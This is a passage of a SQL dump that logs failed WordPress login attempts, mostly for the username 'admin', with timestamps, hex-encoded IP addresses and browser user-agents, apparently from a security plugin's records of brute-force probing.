(247, 2868, 1587926131.523386, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc6c74234, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(248, 2869, 1587927132.590680, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7acb801, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(249, 2870, 1587928121.653901, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23c9fa5a, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(250, 2875, 1587933251.574873, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff76624905, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(251, 2886, 1587946122.831829, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9446bc6b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(252, 2888, 1587948723.948475, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa51635e9, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(253, 2889, 1587950024.708827, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff74cee992, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(254, 2897, 1587959673.243358, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffadf91798, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(255, 2900, 1587962323.357397, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a468, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36');
INSERT INTO `zdenl_wflogins` (`id`, `hitID`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(256, 2904, 1587967435.609044, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5403b00c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(257, 2904, 1587967435.615708, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5403b00c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(258, 2905, 1587968514.632761, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23ca9d60, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(259, 2922, 1588047549.488448, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc6509, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
(260, 2924, 1588065168.083408, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a704, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(261, 2928, 1588084443.874213, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb221e646, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(262, 2954, 1588145950.513847, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dba82e, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(263, 2955, 1588145950.517265, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dba82e, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(264, 3028, 1588234314.731138, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc64f3, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.61'),
(265, 3032, 1588260279.176069, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff7384a86f, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(266, 3036, 1588265815.869576, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffff1b2268d3, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(267, 3037, 1588266773.754732, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffff6768d416, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(268, 3038, 1588267651.788943, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffff7660b898, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(269, 3041, 1588268691.012440, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffff5b0ddfbb, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(270, 3045, 1588273949.129714, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff1f0dc37a, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(271, 3049, 1588279102.086836, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffff66ba15db, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(272, 3051, 1588280135.115345, 1, 'loginFailInvalidUsername', '[LOGIN]', 0, 0x00000000000000000000ffffb758adfa, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(273, 3058, 1588321927.822525, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc6582, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36'),
(274, 3065, 1588352975.074829, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3351fe1e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(275, 3069, 1588379112.718278, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff224219ea, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(276, 3070, 1588379113.624341, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff224219ea, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(277, 3074, 1588415863.552976, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6d46641e, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(278, 3196, 1588484742.065784, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6d466423, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(279, 3208, 1588576980.680296, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff24480e45, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(280, 3217, 1588626618.126462, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3344c973, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(281, 3219, 1588650564.510779, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3359d551, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(282, 3229, 1588760619.360416, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc65f1, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(283, 3230, 1588765574.111738, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff3351fe00, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(284, 3234, 1588798489.018434, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9e45ace1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'),
(285, 3244, 1588846301.056888, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb977510b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(286, 3250, 1588916501.490924, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff592327b4, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331'),
(287, 3251, 1588916502.489054, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffff592327b4, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331'),
(288, 3257, 1588932098.934385, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb32ba7e2, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(289, 3261, 1588955810.848480, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc3ce69d9, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'),
(290, 3266, 1588992733.031462, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc65ce, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36'),
(291, 3277, 1589063741.330058, 1, 'loginFailInvalidUsername', 'zedent_zeki_wp', 0, 0x00000000000000000000ffffb2e915c3, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(292, 3279, 1589082016.990313, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff334baf1f, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(293, 3284, 1589111542.929049, 1, 'loginFailInvalidUsername', 'butwalbajar1', 0, 0x00000000000000000000ffff34afd272, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(294, 3285, 1589111543.693417, 1, 'loginFailInvalidUsername', 'butwalbajar1', 0, 0x00000000000000000000ffff34afd272, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(295, 3287, 1589113081.157783, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff334f56b4, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15'),
(296, 3290, 1589132165.863965, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb32ba7e4, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(297, 3293, 1589170524.578870, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc6515, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(298, 3295, 1589185056.329181, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(299, 3296, 1589202302.047526, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(300, 3298, 1589233658.599183, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2d0994d8, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/68.0.3440.106 Chrome/68.0.3440.106 Safari/537.36'),
(301, 3316, 1589352451.312080, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7725c3b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(302, 3319, 1589384678.789358, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff330f6f1d, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36'),
(303, 3323, 1589414585.554730, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5f82095a, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(304, 3325, 1589425005.653375, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(305, 3328, 1589458704.764529, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(306, 3419, 1589501593.590574, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc1460d05, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),
(307, 3421, 1589518230.514940, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a468, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(308, 3423, 1589533890.821672, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(309, 3424, 1589538114.757296, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7725c39, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),
(310, 3431, 1589606001.543283, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffb280d0b8, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(311, 3434, 1589638714.844298, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff12da2b40, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(312, 3440, 1589671118.257408, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff31eb8c5c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(313, 3443, 1589682872.509817, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff47de590b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(314, 3461, 1589781895.632836, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46f, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(315, 3463, 1589799430.697133, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb977510b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(316, 3468, 1589868073.248568, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955ef6e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(317, 3472, 1589896603.965732, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a704, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(318, 3481, 1589983696.604305, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955bfc9, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(319, 3482, 1589995597.671266, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb977510b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(320, 3496, 1590056039.341638, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a463, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(321, 3497, 1590066309.483377, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a468, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(322, 3498, 1590074152.869057, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a463, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(323, 3502, 1590100527.600657, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(324, 3504, 1590107336.594577, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff5fb8b617, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(325, 3507, 1590119716.846042, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff707e3b35, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(326, 3509, 1590125885.098475, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffff76c8c2b1, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(327, 3511, 1590146402.853797, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955bfc9, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(328, 3523, 1590199065.365270, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(329, 3524, 1590209296.158292, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46d, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(330, 3525, 1590213335.467466, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9ead927, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),
(331, 3541, 1590361559.375805, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a704, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(332, 3557, 1590537584.928651, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a467, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(333, 3573, 1590658564.236097, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(334, 3584, 1590761543.052794, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a466, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(335, 3586, 1590768394.306404, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff675631c1, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.89.36 (KHTML, like Gecko) Version/5.2.7 Safari/530.61'),
(336, 3587, 1590777743.942960, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb96b3001, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.68.15 (KHTML, like Gecko) Chrome/55.1.6686.0314 Safari/532.08 OPR/42.9.4963.9691'),
(337, 3703, 1590801376.965784, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68ffa926, 'Mozilla/5.0 (Windows NT 5.0; rv:52.40.97) Gecko/20139203 Firefox/52.40.97'),
(338, 3705, 1590813205.190755, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a704, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(339, 3708, 1590836838.896063, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff58ec3be2, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.73.26) Gecko/20185714 Firefox/45.73.26'),
(340, 3831, 1590929947.123737, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9a48c56a, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.01.48 (KHTML, like Gecko) Chrome/57.4.9979.4607 Safari/533.30'),
(341, 3831, 1590929947.374764, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9a48c56a, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.01.48 (KHTML, like Gecko) Chrome/57.4.9979.4607 Safari/533.30'),
(342, 3866, 1590981785.712013, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff287272ec, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),
(343, 3865, 1590981785.710148, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff287272ec, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),
(344, 3867, 1590981785.831736, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff287272ec, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),
(345, 3866, 1590981785.839468, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff287272ec, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),
(346, 3868, 1590981786.188823, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff287272ec, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),
(347, 3883, 1591035423.087460, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955ef6e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(348, 3891, 1591136207.326751, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a462, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(349, 3894, 1591174567.179129, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(350, 3898, 1591196532.514473, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb01f6970, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(351, 3904, 1591230323.070815, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff253b386b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(352, 3919, 1591261853.399412, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a465, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(353, 3936, 1591347043.248270, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc063228e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(354, 3950, 1591461101.555126, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2f59b3e4, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(355, 3952, 1591480061.112808, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a462, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(356, 3954, 1591495224.768795, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23cd1629, 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12'),
(357, 3974, 1591521158.889084, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff34ffa4e8, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(358, 3975, 1591521158.970741, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff34ffa4e8, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(359, 4040, 1591597616.206340, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955bfc4, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(360, 4043, 1591619377.895482, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955eef4, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
